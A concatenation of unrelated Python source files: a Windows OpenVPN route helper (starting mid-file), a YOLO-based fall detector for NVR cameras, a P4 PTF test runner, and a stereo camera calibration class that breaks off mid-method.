if b'Initialization' in line:
print("Makeroute called")
makeRoute(componentId)
break
if line is b'':
break
if b'Restart' in line:
t.do_run = False
break
time.sleep(0.2)
while getattr(t, "do_run", True):
prog.poll()
time.sleep(0.5)
print("stopped")
kill(prog.pid)
#def setAddress(componentId):
# cmd = ["netsh.exe","interface","ip","set","address","name="+componentId,"static",ip, mask, gateway]
# prog = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
### Add the route to connect to the vpn
def makeRoute(componentId):
gateway = getIpAddressGateway(socket.AF_INET,componentId)
cmd = ["route", "add", "0.0.0.0", "mask", "0.0.0.0", gateway, "metric", "1000"]
prog = subprocess.Popen(cmd)
### Add a vpn connection using the conf file. Returns a thread that runs the VPN
def mainVPN(ConfTcp,ConfUdp = None):
if not Path(OpenVpnPath).is_file():
raise ValueError("Openvpn not installed")
with reg.OpenKey(reg.HKEY_LOCAL_MACHINE, ADAPTER_KEY) as adapters:
try:
for i in range(10000):
key_name = reg.EnumKey(adapters, i)
with reg.OpenKey(adapters, key_name) as adapter:
try:
component_id = reg.QueryValueEx(adapter, 'ComponentId')[0]
if component_id == 'tap0901':
key = reg.QueryValueEx(adapter, 'NetCfgInstanceId')[0]
except :
pass
except:
pass
if key is None:
raise ValueError("TAP Windows not installed")
for proc in psutil.process_iter():
try:
process = psutil.Process(proc.pid)
pname = process.name()
if pname == "openvpn.exe" and process.parent().parent() == "python.exe":
kill(proc.pid)
except:
pass
regConnection = reg.OpenKey(reg.HKEY_LOCAL_MACHINE, ConnectionKey+"\\"+key+"\\Connection")
componentId = reg.QueryValueEx(regConnection, "name")[0]
print("RESULT: "+componentId)
if Path(ConfTcp).is_file():
if (ConfUdp is not None) and (Path(ConfUdp).is_file()):
thVPN = Thread(target=VPNConnect, args=(OpenVpnPath, componentId, ConfTcp, ConfUdp))
thVPN.start()
else:
thVPN = Thread(target=VPNConnect, args=(OpenVpnPath, componentId, ConfTcp,))
thVPN.start()
return (thVPN,componentId)
|
fall_detection.py
|
import sys
sys.path.append('../')
sys.path.append('../TensorFlow-2.x-YOLOv3')
from yolov3.configs import *
from yolov3.utils import load_yolo_weights, image_preprocess, postprocess_boxes, nms, draw_bbox, read_class_names
from yolov3.yolov4 import Create_Yolo
import tensorflow as tf
import numpy as np
import os
from webAPI import WebAPI
import cv2
import time
import threading
import queue
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
from utils import setup_tf_conf, get_latest_frame
setup_tf_conf()
# replace the following with your NVR IP address and port and user account
IP_ADDR = 'xxx.xxx.xxx.xxx'
PORT = 'xxxx'
ACCOUNT = 'xxxxxx'
PASSWORD = 'xxxxxx'
def check_fall(NUM_CLASS, class_ind, w, h):
return NUM_CLASS[class_ind] == 'person' and w > 1.8 * h
def detect_fall(YoloV3, img, input_size=416, CLASSES=YOLO_COCO_CLASSES, score_threshold=0.3, iou_threshold=0.45, rectangle_colors=''):
try:
original_image = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
original_image = cv2.cvtColor(original_image, cv2.COLOR_BGR2RGB)
except:
raise('Invalid image!')
image_data = image_preprocess(np.copy(original_image), [
input_size, input_size])
image_data = tf.expand_dims(image_data, 0)
t1 = time.time()
pred_bbox = YoloV3.predict(image_data)
t2 = time.time()
pred_bbox = [tf.reshape(x, (-1, tf.shape(x)[-1])) for x in pred_bbox]
pred_bbox = tf.concat(pred_bbox, axis=0)
bboxes = postprocess_boxes(
pred_bbox, original_image, input_size, score_threshold)
bboxes = nms(bboxes, iou_threshold, method='nms')
ms = (t2 - t1) * 1000
fps = 1000 / ms
print('Time: {:.2f}ms, {:.1f} FPS'.format(ms, fps))
fall_bboxes = []
for i, bbox in enumerate(bboxes):
coor = np.array(bbox[:4], dtype=np.int32)
class_ind = int(bbox[5])
(x1, y1), (x2, y2) = (coor[0], coor[1]), (coor[2], coor[3])
if check_fall(CLASSES, class_ind, x2-x1, y2-y1):
fall_bboxes.append(bbox)
if len(fall_bboxes) > 0:
image = draw_bbox(original_image, fall_bboxes,
rectangle_colors=rectangle_colors)
cv2.imwrite('fall-detection.jpg', image)
return True
else:
return False
def read_frame(q, rtsp):
stream = cv2.VideoCapture(rtsp)
while True:
ret, frame = stream.read()
if ret:
q.put(frame)
def process_frame(q, webapi, camera_id, yolo, classes, fall_label):
while True:
frame = get_latest_frame(q)
if detect_fall(yolo, frame, input_size=YOLO_INPUT_SIZE, CLASSES=classes, rectangle_colors=(255, 0, 0)):
print('Fall detect!')
webapi.start_action_rule_recording()
webapi.send_notification()
# Wait for the Action Rule recording finishing starting
# If there's no sleep here, tags might be added to the prevous recording.
time.sleep(1)
recordings = webapi.list_recordings([camera_id])
recording_ids = [recording['id'] for recording in recordings]
recording_id = recording_ids[0]
webapi.add_label_to_recording(recording_id, fall_label)
def main():
webapi = WebAPI(IP_ADDR, PORT, ACCOUNT, PASSWORD)
cameras = webapi.list_cameras()
camera_ids = [camera['id'] for camera in cameras]
# the last added camera in the Surveillance Station
camera_id = camera_ids[-1]
rtsp = webapi.get_liveview_rtsp(camera_id)
fall_label = webapi.create_recording_label('fall_event')
# Initialize fall detection model
yolo = Create_Yolo(input_size=YOLO_INPUT_SIZE)
load_yolo_weights(yolo, YOLO_V3_WEIGHTS) # use Darknet weights
classes = read_class_names(YOLO_COCO_CLASSES)
q = queue.Queue()
p1 = threading.Thread(target=read_frame, args=([q, rtsp]))
p2 = threading.Thread(target=process_frame,
args=([q, webapi, camera_id, yolo, classes, fall_label]))
p1.start()
p2.start()
p1.join()
p2.join()
webapi.logout()
if __name__ == '__main__':
main()
|
ptf_runner.py
|
#!/usr/bin/env python2
# Copyright 2013-present Barefoot Networks, Inc.
# Copyright 2018-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import Queue
import argparse
import json
import logging
import os
import re
import struct
import subprocess
import sys
import threading
from collections import OrderedDict
import google.protobuf.text_format
import grpc
from p4.tmp import p4config_pb2
from p4.v1 import p4runtime_pb2
from bmv2 import Bmv2Switch
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger("PTF runner")
def error(msg, *args, **kwargs):
logger.error(msg, *args, **kwargs)
def warn(msg, *args, **kwargs):
logger.warn(msg, *args, **kwargs)
def info(msg, *args, **kwargs):
logger.info(msg, *args, **kwargs)
def check_ifaces(ifaces):
"""
Checks that required interfaces exist.
"""
ifconfig_out = subprocess.check_output(['ifconfig'])
iface_list = re.findall(r'^(\S+)', ifconfig_out, re.S | re.M)
present_ifaces = set(iface_list)
ifaces = set(ifaces)
return ifaces <= present_ifaces
def build_bmv2_config(bmv2_json_path):
"""
Builds the device config for BMv2
"""
device_config = p4config_pb2.P4DeviceConfig()
device_config.reassign = True
with open(bmv2_json_path) as f:
device_config.device_data = f.read()
return device_config
def build_tofino_config(prog_name, bin_path, cxt_json_path):
device_config = p4config_pb2.P4DeviceConfig()
with open(bin_path, 'rb') as bin_f:
with open(cxt_json_path, 'r') as cxt_json_f:
device_config.device_data = ""
device_config.device_data += struct.pack("<i", len(prog_name))
device_config.device_data += prog_name
tofino_bin = bin_f.read()
device_config.device_data += struct.pack("<i", len(tofino_bin))
device_config.device_data += tofino_bin
cxt_json = cxt_json_f.read()
device_config.device_data += struct.pack("<i", len(cxt_json))
device_config.device_data += cxt_json
return device_config
def update_config(p4info_path, bmv2_json_path, tofino_bin_path,
tofino_cxt_json_path, grpc_addr, device_id):
"""
Performs a SetForwardingPipelineConfig on the device
"""
channel = grpc.insecure_channel(grpc_addr)
stub = p4runtime_pb2.P4RuntimeStub(channel)
info("Sending P4 config")
# Send master arbitration via stream channel
# This should go in library, to be re-used also by base_test.py.
stream_out_q = Queue.Queue()
def stream_req_iterator():
while True:
p = stream_out_q.get()
if p is None:
break
yield p
def stream_recv(s):
pass
stream = stub.StreamChannel(stream_req_iterator())
stream_recv_thread = threading.Thread(target=stream_recv, args=(stream,))
stream_recv_thread.start()
req = p4runtime_pb2.StreamMessageRequest()
arbitration = req.arbitration
arbitration.device_id = device_id
election_id = arbitration.election_id
election_id.high = 0
election_id.low = 1
stream_out_q.put(req)
try:
# Set pipeline config.
request = p4runtime_pb2.SetForwardingPipelineConfigRequest()
request.device_id = device_id
election_id = request.election_id
election_id.high = 0
election_id.low = 1
config = request.config
with open(p4info_path, 'r') as p4info_f:
google.protobuf.text_format.Merge(p4info_f.read(), config.p4info)
if bmv2_json_path is not None:
device_config = build_bmv2_config(bmv2_json_path)
else:
device_config = build_tofino_config("name", tofino_bin_path,
tofino_cxt_json_path)
config.p4_device_config = device_config.SerializeToString()
request.action = p4runtime_pb2.SetForwardingPipelineConfigRequest.VERIFY_AND_COMMIT
try:
stub.SetForwardingPipelineConfig(request)
except Exception as e:
error("Error during SetForwardingPipelineConfig")
error(str(e))
return False
return True
finally:
stream_out_q.put(None)
stream_recv_thread.join()
def run_test(p4info_path, grpc_addr, device_id, cpu_port, ptfdir, port_map_path,
platform=None, extra_args=()):
"""
Runs PTF tests included in provided directory.
Device must be running and configfured with appropriate P4 program.
"""
# TODO: check schema?
# "ptf_port" is ignored for now, we assume that ports are provided by
# increasing values of ptf_port, in the range [0, NUM_IFACES[.
port_map = OrderedDict()
with open(port_map_path, 'r') as port_map_f:
port_list = json.load(port_map_f)
for entry in port_list:
p4_port = entry["p4_port"]
iface_name = entry["iface_name"]
port_map[p4_port] = iface_name
if not check_ifaces(port_map.values()):
error("Some interfaces are missing")
return False
ifaces = []
# FIXME
# find base_test.py
pypath = os.path.dirname(os.path.abspath(__file__))
if 'PYTHONPATH' in os.environ:
os.environ['PYTHONPATH'] += ":" + pypath
else:
os.environ['PYTHONPATH'] = pypath
for iface_idx, iface_name in port_map.items():
ifaces.extend(['-i', '{}@{}'.format(iface_idx, iface_name)])
cmd = ['ptf']
cmd.extend(['--test-dir', ptfdir])
cmd.extend(ifaces)
test_params = 'p4info=\'{}\''.format(p4info_path)
test_params += ';grpcaddr=\'{}\''.format(grpc_addr)
test_params += ';device_id=\'{}\''.format(device_id)
test_params += ';cpu_port=\'{}\''.format(cpu_port)
if platform is not None:
test_params += ';pltfm=\'{}\''.format(platform)
cmd.append('--test-params={}'.format(test_params))
cmd.extend(extra_args)
info("Executing PTF command: {}".format(' '.join(cmd)))
try:
# we want the ptf output to be sent to stdout
p = subprocess.Popen(cmd)
p.wait()
except:
error("Error when running PTF tests")
return False
return p.returncode == 0
def check_ptf():
try:
with open(os.devnull, 'w') as devnull:
subprocess.check_call(['ptf', '--version'],
stdout=devnull, stderr=devnull)
return True
except subprocess.CalledProcessError:
return True
except OSError: # PTF not found
return False
# noinspection PyTypeChecker
def main():
parser = argparse.ArgumentParser(
description="Compile the provided P4 program and run PTF tests on it")
parser.add_argument('--device',
help='Target device',
type=str, action="store", required=True,
choices=['tofino', 'bmv2', 'stratum-bmv2'])
parser.add_argument('--p4info',
help='Location of p4info proto in text format',
type=str, action="store", required=True)
parser.add_argument('--bmv2-json',
help='Location BMv2 JSON output from p4c (if target is bmv2)',
type=str, action="store", required=False)
parser.add_argument('--tofino-bin',
help='Location of Tofino .bin output from p4c (if target is tofino)',
type=str, action="store", required=False)
parser.add_argument('--tofino-ctx-json',
help='Location of Tofino context.json output from p4c (if target is tofino)',
type=str, action="store", required=False)
parser.add_argument('--grpc-addr',
help='Address to use to connect to P4 Runtime server',
type=str, default='localhost:50051')
parser.add_argument('--device-id',
help='Device id for device under test',
type=int, default=1)
parser.add_argument('--cpu-port',
help='CPU port ID of device under test',
type=int, required=True)
parser.add_argument('--ptf-dir',
help='Directory containing PTF tests',
type=str, required=True)
parser.add_argument('--port-map',
help='Path to JSON port mapping',
type=str, required=True)
parser.add_argument('--platform',
help='Target platform on which tests are run (if target is tofino)',
type=str, required=False)
parser.add_argument('--skip-config',
help='Assume a device with pipeline already configured',
action="store_true", default=False)
parser.add_argument('--skip-test',
help='Skip test execution (useful to perform only pipeline configuration)',
action="store_true", default=False)
args, unknown_args = parser.parse_known_args()
if not check_ptf():
error("Cannot find PTF executable")
sys.exit(1)
device = args.device
bmv2_json = None
tofino_ctx_json = None
tofino_bin = None
if not os.path.exists(args.p4info):
error("P4Info file {} not found".format(args.p4info))
sys.exit(1)
if device == 'tofino':
if not os.path.exists(args.tofino_bin):
error("Tofino binary config file {} not found".format(
args.tofino_bin))
sys.exit(1)
if not os.path.exists(args.tofino_ctx_json):
error("Tofino context json file {} not found".format(
args.tofino_ctx_json))
sys.exit(1)
tofino_bin = args.tofino_bin
tofino_ctx_json = args.tofino_ctx_json
elif device == 'bmv2' or device == 'stratum-bmv2':
if not os.path.exists(args.bmv2_json):
error("BMv2 json file {} not found".format(args.bmv2_json))
sys.exit(1)
bmv2_json = args.bmv2_json
if not os.path.exists(args.port_map):
print "Port map path '{}' does not exist".format(args.port_map)
sys.exit(1)
grpc_port = args.grpc_addr.split(':')[1]
bmv2_sw = None
if device == 'bmv2':
bmv2_sw = Bmv2Switch(device_id=args.device_id,
port_map_path=args.port_map,
grpc_port=grpc_port,
cpu_port=args.cpu_port,
loglevel='debug')
bmv2_sw.start()
elif device == 'stratum-bmv2':
bmv2_sw = Bmv2Switch(device_id=args.device_id,
port_map_path=args.port_map,
grpc_port=grpc_port,
cpu_port=args.cpu_port,
loglevel='debug',
is_stratum=True)
bmv2_sw.start()
try:
success = True
if not args.skip_config:
success = update_config(p4info_path=args.p4info,
bmv2_json_path=bmv2_json,
tofino_bin_path=tofino_bin,
tofino_cxt_json_path=tofino_ctx_json,
grpc_addr=args.grpc_addr,
device_id=args.device_id)
if not success:
if bmv2_sw is not None:
bmv2_sw.kill()
sys.exit(2)
if not args.skip_test:
success = run_test(p4info_path=args.p4info,
device_id=args.device_id,
grpc_addr=args.grpc_addr,
cpu_port=args.cpu_port,
ptfdir=args.ptf_dir,
port_map_path=args.port_map,
platform=args.platform,
extra_args=unknown_args)
if bmv2_sw is not None:
bmv2_sw.kill()
if not success:
sys.exit(3)
except Exception:
if bmv2_sw is not None:
bmv2_sw.kill()
raise
if __name__ == '__main__':
main()
|
stereo_camera.py
|
from stereo_camera.network_agent import ImageReceiver
from stereo_camera.image_proc_tools import compute_disparity, process_stereo_image
from stereo_camera.errors import *
import cv2
import numpy as np
import os
import glob
import psutil
import time
import matplotlib.pyplot as plt
from threading import Thread, Event
from collections import deque
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, as_completed
import typing
DELAY_TOL = 0.3
class StereoCamera:
"""Class representing a StereoCamera, composed by two ImageReceiver objects; it enables and simplifies the
concurrent communication with both sensors.
Attributes:
_left_sensor --- ImageSender objects related to the left sensor
_right_sensor --- ImageSender objects related to the right sensor
_io_ref_thread --- reference IO thread that reads from the left sensor's SUB socket and stores both the
timestamp and the frame as reference, respectively in _ref_timestamp and in _ref_frame fields
_ref_timestamp --- timestamp of the left frame, used as reference to find the right frame with minimum delay
_ref_frame --- left frame, used as reference
_data_ready_ref --- event that notifies the main process when new data has been read from the left sensor
_io_sec_thread --- secondary IO thread that reads from the right sensor's SUB socket and stores the pair
(timestamp, frame) in the _sec_buffer queue
_sec_buffer --- queue which keeps the 5 most recent frames from the right sensor
_data_ready_sec --- event that notifies the main process when new data has been read from the right sensor
_trigger_kill_threads --- event that kills the two IO threads
_calib_params --- dictionary containing the calibration parameters (initially empty)
_disp_params --- dictionary containing the disparity parameters (initially empty)
_is_calibrated --- boolean variable indicating whether the stereo sensor is calibrated or not
(initially set to 'False')
_has_disparity_params --- boolean variable indicating whether the stereo sensor has disparity
_parameters set or not (initially set to 'False')
_disp_bounds --- tuple of floats representing the minimum and maximum disparity values detected
Methods:
multicast_send_sig --- method which enables the concurrent sending of a control signal via the
two ImageReceiver objects
multicast_recv_sig --- method which enables the concurrent reception of a control signal via the
two ImageReceiver objects
_create_io_threads --- method which creates and starts the two IO threads to read the frames in background
_kill_io_threads --- method which kills the two IO threads
_recv_frame_in_background_sec --- target of the secondary IO thread: it repeatedly reads new data from the right
sensor and stores it in a queue
_recv_frame_in_background_ref --- target of the reference IO thread: it repeatedly reads new data from the left
sensor and stores it in a field
_read_stereo_frames --- method that determines which right frame in the queue has the minimum delay w.r.t. the
reference frame, and returns the stereo pair
load_calib_params --- method which reads the calibration parameters from a given file
_set_calib_params --- method which sets/updates the calibration parameters
_save_calib_params --- method which persists the calibration parameters to a given file
load_disp_params --- method which reads the disparity parameters from a given file
_set_disp_params --- method which sets/updates the disparity parameters
_save_disp_params --- method which persists the disparity parameters to a given file
_flush_pending_frames --- method which flushes both image sockets
close --- method which releases the network resources used by the two ImageReceiver objects
capture_sample_images --- method which captures sample images for calibration
calibrate --- given the sample images, it computes the calibration parameters"""
def __init__(self, ip_addrL: str, ip_addrR: str, img_port: int, ctrl_port: int):
# Set up one ImageReceiver object for each sensor
self._left_sensor = ImageReceiver(ip_addrL, img_port, ctrl_port)
self._right_sensor = ImageReceiver(ip_addrR, img_port, ctrl_port)
# Set up two IO thread to read from the two sensors
self._io_ref_thread = None
self._ref_timestamp = None
self._ref_frame = None
self._data_ready_ref = Event()
self._io_sec_thread = None
self._sec_buffer = deque(maxlen=5)
self._data_ready_sec = Event()
self._trigger_kill_threads = Event()
# Calibration data
self._calib_params = {}
self._disp_params = {}
self._is_calibrated = False
self._has_disparity_params = False
# Keep track of min and max disparities
self._disp_bounds = [np.inf, -np.inf]
def multicast_send_sig(self, sig: bytes):
"""Method which enables the concurrent sending of a signal to both ImageReceiver objects
:param sig: string representing the signal to be sent concurrently to both sensors"""
with ThreadPoolExecutor(max_workers=2) as executor:
executor.submit(self._left_sensor.send_sig, sig)
executor.submit(self._right_sensor.send_sig, sig)
def multicast_recv_sig(self) -> (str, str):
"""Method which enables the concurrent reception of a signal from both ImageSender objects
:returns a tuple containing the two messages received"""
with ThreadPoolExecutor(max_workers=2) as executor:
futureL = executor.submit(self._left_sensor.recv_sig)
futureR = executor.submit(self._right_sensor.recv_sig)
sigL = futureL.result()
sigR = futureR.result()
return sigL, sigR
def _create_io_threads(self):
"""Methods which creates and starts the IO thread."""
self._trigger_kill_threads.clear()
self._io_ref_thread = Thread(target=self._recv_frame_in_background_ref, args=())
self._io_sec_thread = Thread(target=self._recv_frame_in_background_sec, args=())
self._io_ref_thread.start()
self._io_sec_thread.start()
def _kill_io_threads(self):
"""Methods which kills the IO threads, clears the thread events concerning data, and flushes the sockets."""
self._trigger_kill_threads.set()
self._io_ref_thread.join()
self._io_sec_thread.join()
# Clear events
self._data_ready_ref.clear()
self._data_ready_sec.clear()
# Set to None reference frame and reference timestamp, and clear the buffer
self._ref_frame = None
self._ref_timestamp = None
self._sec_buffer.clear()
# Flush pending frames
self._flush_pending_stereo_frames()
print("\nPending frames flushed.")
def _recv_frame_in_background_ref(self):
"""Methods which is meant to be executed by the reference IO thread: it repeatedly reads in background a frame
from the left sensor and stores it as the reference frame and timestamp."""
while not self._trigger_kill_threads.is_set():
tstamp, frame = self._left_sensor.recv_frame()
self._ref_frame = frame
self._ref_timestamp = tstamp
self._data_ready_ref.set()
def _recv_frame_in_background_sec(self):
"""Methods which is meant to be executed by the secondary IO thread: it repeatedly reads in background a frame
from the right sensor and saves it in a temporary buffer."""
while not self._trigger_kill_threads.is_set():
self._sec_buffer.append(self._right_sensor.recv_frame())
self._data_ready_sec.set()
def _read_stereo_frames(self) -> (np.ndarray, np.ndarray):
"""Method which reads from the IO thread the most recent pair of stereo frames.
:returns a tuple containing the two frames"""
if not self._data_ready_ref.wait(timeout=1.0):
raise TimeoutError("Timeout while reading from the left sensors.")
if not self._data_ready_sec.wait(timeout=1.0):
raise TimeoutError("Timeout while reading from the right sensors.")
delay_dict = {
abs(self._ref_timestamp - _sec_timestamp): _sec_frame
for _sec_timestamp, _sec_frame in self._sec_buffer
}
best_left_right_delay, best_match_frame = min(delay_dict.items())
self._data_ready_ref.clear()
self._data_ready_sec.clear()
if best_left_right_delay > DELAY_TOL:
raise OutOfSyncError(best_left_right_delay)
latency = time.time() - self._ref_timestamp
print(
f"\rLatency: {latency:.3f} s --- Left-Right Delay: {best_left_right_delay:.3f} s",
end="",
)
return self._ref_frame, best_match_frame
def load_calib_params(self, calib_file: str):
# Load calibration parameters from file
calib_params = np.load(calib_file + ".npz")
# Set object's calibration parameters
self._set_calib_params(calib_params)
def _set_calib_params(self, calib_params):
# Update object's calibration parameters
self._calib_params.update(calib_params)
self._is_calibrated = True
def _save_calib_params(self, calib_file: str):
# Copy the dictionary and add a key-value pair representing the file path
# (required by NumPy 'savez_compressed' function)
calib_file_to_save = self._calib_params.copy()
calib_file_to_save["file"] = calib_file
# Save calibration parameters to file
np.savez_compressed(**calib_file_to_save)
def load_disp_params(self, disp_file: str):
# Load disparity parameters from file
disp_params = {
k: int(v) for k, v in np.load(disp_file + ".npz").items() if k != "file"
}
# Set object's disparity parameters
self._set_disp_params(disp_params)
def _set_disp_params(self, disp_params):
# Update object's disparity parameters
self._disp_params.update(disp_params)
self._has_disparity_params = True
def _save_disp_params(self, disp_file: str):
# Copy the dictionary and add a key-value pair representing the file path
# (required by NumPy 'savez_compressed' function)
disp_file_to_save = self._disp_params.copy()
disp_file_to_save["file"] = disp_file
# Save disparity parameters to file
np.savez_compressed(**disp_file_to_save)
def _flush_pending_stereo_frames(self):
"""Method that flushes the pending frames of both ImageReceiver objects."""
self._left_sensor.flush_pending_frames()
self._right_sensor.flush_pending_frames()
def _reset_sensors(self):
# Send reset signal to both sensors
self.multicast_send_sig(b"RESET")
# Kill IO threads
self._kill_io_threads()
# Wait for ready signal from sensors and then send start signal
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
self.multicast_send_sig(b"START")
# Re-create IO threads
self._create_io_threads()
def close(self):
"""Method that closes the sockets and the contexts of both ImageSender objects to free resources."""
self._left_sensor.close()
self._right_sensor.close()
def capture_sample_images(self, img_folder: str):
"""Method which captures sample stereo images
:param img_folder: string representing the path to the folder in which images will be saved"""
print("Collecting images of a chessboard for calibration...")
# Initialize variables for countdown
n_pics, tot_pics = 0, 30
n_sec, tot_sec = 0, 4
str_sec = "4321"
# Define folders where calibration images will be stored
pathL = os.path.join(img_folder, "L")
pathR = os.path.join(img_folder, "R")
# Wait for ready signal from sensors
sigL, sigR = self.multicast_recv_sig()
print(f"Left sensor: {sigL}")
print(f"Right sensor: {sigR}")
print("Both sensors are ready")
# Synchronize sensors with a start signal
self.multicast_send_sig(b"START")
self._create_io_threads()
# Save start time
start_time = time.time()
while True:
# Get frames from both cameras
try:
frameL, frameR = self._read_stereo_frames()
except OutOfSyncError as e:
print(
f"\nThe two sensors are out of sync of {e.delay:3f} s and must be restarted."
)
self._reset_sensors()
continue
# Flip frames horizontally to make it more comfortable for humans
flipped_frameL = cv2.flip(frameL, 1)
flipped_frameR = cv2.flip(frameR, 1)
# Display counter on screen before saving frame
if n_sec < tot_sec:
# Draw on screen the current remaining pictures
cv2.putText(
img=flipped_frameL,
text=f"{n_pics}/{tot_pics}",
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# Draw on screen the current remaining seconds
cv2.putText(
img=flipped_frameR,
text=str_sec[n_sec],
org=(int(10), int(40)),
fontFace=cv2.FONT_HERSHEY_DUPLEX,
fontScale=1,
color=(255, 255, 255),
thickness=3,
lineType=cv2.LINE_AA,
)
# If time elapsed is greater than one second, update 'n_sec'
time_elapsed = time.time() - start_time
if time_elapsed >= 1:
n_sec += 1
start_time = time.time()
else:
# When countdown ends, save original grayscale image to file
gray_frameL = cv2.cvtColor(frameL, cv2.COLOR_BGR2GRAY)
gray_frameR = cv2.cvtColor(frameR, cv2.COLOR_BGR2GRAY)
cv2.imwrite(os.path.join(pathL, f"{n_pics:02d}" + ".jpg"), gray_frameL)
cv2.imwrite(os.path.join(pathR, f"{n_pics:02d}" + ".jpg"), gray_frameR)
# Update counters
n_pics += 1
n_sec = 0
print(f"\n{n_pics}/{tot_pics} images collected.")
# Display side by side the flipped frames
frames = np.hstack((flipped_frameR, flipped_frameL))
cv2.imshow("Left and right frames", frames)
# If 'q' is pressed, or enough images are collected,
# termination signal is sent to the sensors and streaming ends
if (cv2.waitKey(1) & 0xFF == ord("q")) or n_pics == tot_pics:
self.multicast_send_sig(b"STOP")
self._kill_io_threads()
break
cv2.destroyAllWindows()
print("Images collected.")
def calibrate(
self,
img_folder: str,
pattern_size: typing.Tuple[int, int],
square_length: float,
calib_file: str,
):
"""Computes the calibration parameters of a sensor by using several pictures of a chessboard
:param img_folder: string representing the path to the folder in which images are saved
:param pattern_size: size of the chessboard used for calibration
:param square_length: float representing the length, in mm, of the square edge
:param calib_file: path to the file where calibration parameters will be saved"""
# Define folders where calibration images will be stored
pathL = os.path.join(img_folder, "L")
pathR = os.path.join(img_folder, "R")
# Get a list of images captured, one per folder
img_namesL = glob.glob(os.path.join(pathL, "*.jpg"))
img_namesR = glob.glob(os.path.join(pathR, "*.jpg"))
# If one of the two lists is empty, raise exception
if len(img_namesL) == 0 or len(img_namesR) == 0:
raise CalibrationImagesNotFoundError(img_folder)
# Produce a list of pairs '(right_image, left_image)'
# If one list has more elements than the other, the extra elements will be automatically discarded by 'zip'
img_name_pairs = list(zip(img_namesL, img_namesR))
# Get number of available cores
n_procs = psutil.cpu_count(logical=False)
# Process in parallel stereo images
stereo_img_names = []
stereo_img_points_list = []
stereo_img_drawn_corners_list = []
with ProcessPoolExecutor(max_workers=n_procs) as executor:
futures = [
executor.submit(process_stereo_image, img_name_pair, pattern_size)
for img_name_pair in img_name_pairs
]
for future in as_completed(futures):
try:
(
stereo_img_name,
stereo_img_points,
stereo_img_drawn_corners,
) = future.result()
stereo_img_names.append(stereo_img_name)
stereo_img_points_list.append(stereo_img_points)
stereo_img_drawn_corners_list.append(stereo_img_drawn_corners)
except ChessboardNotFoundError as e:
print(f"No chessboard found in image {e.file}")
# If no chessboard was detected, raise exception
if len(stereo_img_points_list) == 0:
raise ChessboardNotFoundError(img_folder)
# Produce two lists of image points, one for the right and one for the left cameras
stereo_img_points_unzipped = [list(t) for t in zip(*stereo_img_points_list)]
img_pointsL = stereo_img_points_unzipped[0]
img_pointsR = stereo_img_points_unzipped[1]
# Prepare object points by obtaining a grid, scaling it by the square edge length and reshaping it
pattern_points = np.zeros(
[pattern_size[0] * pattern_size[1], 3], dtype=np.float32
)
pattern_points[:, :2] = (
np.indices(pattern_size, dtype=np.float32) * square_length
).T.reshape(-1, 2)
# Append them in a list with the same length as the image points' one
obj_points = []
for i in range(0, len(img_pointsL)):
obj_points.append(pattern_points)
# Get sensor size
h, w = stereo_img_drawn_corners_list[0][0].shape[:2]
# Calibrate concurrently single cameras and get the sensor intrinsic parameters
print("Calibrating left and right sensors...")
with ProcessPoolExecutor(max_workers=2) as executor:
futureL = executor.submit(
cv2.calibrateCamera, obj_points, img_pointsL, (w, h), None, None
)
futureR = executor.submit(
cv2.calibrateCamera, obj_points, img_pointsR, (w, h), None, None
)
rmsL, cam_mtxL, distL, _, _ = futureL.result()
rmsR, cam_mtxR, distR, _, _ = futureR.result()
print(f"Left sensor calibrated, RMS = {rmsL:.5f}")
print(f"Right sensor calibrated, RMS = {rmsR:.5f}")
# Use intrinsic parameters to calibrate more reliably the stereo sensor
print("Calibrating stereo sensor...")
flag = cv2.CALIB_FIX_INTRINSIC
(
error,
cam_mtxL,
distL,
cam_mtxR,
distR,
rot_mtx,
trasl_mtx,
e_mtx,
f_mtx,
) = cv2.stereoCalibrate(
obj_points,
img_pointsL,
img_pointsR,
cam_mtxL,
distL,
cam_mtxR,
distR,
(w, h),
flags=flag,
)
print(f"Stereo sensor calibrated, error: {error:.5f}")
(
rot_mtxL,
rot_mtxR,
proj_mtxL,
proj_mtxR,
disp_to_depth_mtx,
valid_ROIL,
valid_ROIR,
) = cv2.stereoRectify(
cam_mtxL, distL, cam_mtxR, distR, (w, h), rot_mtx, trasl_mtx
)
# Compute the undistorted and rectify mapping
mapxL, mapyL = cv2.initUndistortRectifyMap(
cam_mtxL, distL, rot_mtxL, proj_mtxL, (w, h), cv2.CV_32FC1
)
mapxR, mapyR = cv2.initUndistortRectifyMap(
cam_mtxR, distR, rot_mtxR, proj_mtxR, (w, h), cv2.CV_32FC1
)
# Save all sensor parameters to .npz files
calib_params = {
"cam_mtxL": cam_mtxL,
"cam_mtxR": cam_mtxR,
"disp_to_depth_mtx": disp_to_depth_mtx,
"distL": distL,
"distR": distR,
"mapxL": mapxL,
"mapxR": mapxR,
"mapyL": mapyL,
"mapyR": mapyR,
"proj_mtxL": proj_mtxL,
"proj_mtxR": proj_mtxR,
"rot_mtx": rot_mtx,
"rot_mtxL": rot_mtxL,
"rot_mtxR": rot_mtxR,
"trasl_mtx": trasl_mtx,
"valid_ROIL": valid_ROIL,
"valid_ROIR": valid_ROIR,
}
self._set_calib_params(calib_params)
self._save_calib_params(calib_file)
print("Calibration parameters saved to file")
# Plot the images with corners drawn on the chessboard and with calibration applied
for i in range(0, len(stereo_img_names)):
stereo_img_drawn_corners = stereo_img_drawn_corners_list[i]
fig, ax = plt.subplots(nrows=2, ncols=2)
fig.suptitle(stereo_img_names[i])
# Plot the original images
ax[0][0].imshow(stereo_img_drawn_corners[0])
ax[0][0].set_title("L frame")
ax[0][1].imshow(stereo_img_drawn_corners[1])
